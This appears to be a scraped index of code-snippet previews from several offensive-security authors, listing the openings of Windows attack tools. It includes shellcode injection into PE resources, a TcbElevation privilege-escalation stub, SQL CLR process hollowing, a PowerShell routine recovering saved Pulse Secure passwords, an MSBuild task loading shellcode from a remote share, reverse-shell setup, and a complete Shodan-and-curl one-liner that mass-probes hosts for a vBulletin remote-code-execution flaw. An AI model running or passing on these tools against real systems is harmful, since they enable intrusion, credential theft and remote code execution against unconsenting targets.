WKL-Sec

#include <iostream>
#include <windows.h>

void* GetBaseAddressOfKernel32() {
    void* kernel32BaseAddress = nullptr;

    __asm {
        mov rdi, 0xFFFFFFFFFFFFFFFF // Set RDI to -1
        inc rdi                    // Increment RDI to 0
        mov rax, 0                 // Zero out RAX

susMdT

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
    // CCOB IS THE GOAT

Wra7h

/*
 * PEResourceInject (C# version for x64) by Wra7h
 * 
 * Add a bitmap resource to an executable. Parse the PE header and calculate the address of the shellcode.
 * This avoids direct calls to VirtualAllocEx & WriteProcessMemory, but will modify the target exe on disk,
 * and this implementation will create a backup of the executable in the same directory with a ".bak" extension.
 * 
 * Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs
 * Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin>
 * 

antonioCoco

// TcbElevation - Authors: @splinter_code and @decoder_it

#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>

#pragma comment(lib, "Secur32.lib")

void EnableTcbPrivilege(BOOL enforceCheck);

skahwah

//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs
//SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\hollow.dll /function:BaconTime
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;

unbaiat

Add-Type -AssemblyName System.Security;

$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
    $ivename = $ive.PSPath.split('\')[-1].ToUpper()
    Write-Host "[+] Checking IVE $($ivename)..."
    $seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
    # 3 possible value names for password
    $encrypted = $ive.Password1
    if(!$encrypted){

qkaiser

Add-Type -AssemblyName System.Security;

$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
    $ivename = $ive.PSPath.split('\')[-1].ToUpper()
    Write-Host "[+] Checking IVE $($ivename)..."
    $seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
    # 3 possible value names for password
    $encrypted = $ive.Password1
    if(!$encrypted){

Mad-robot

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

rvrsh3ll

<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
		MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>

FrankSpierings

#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'

CURDIR=$(pwd)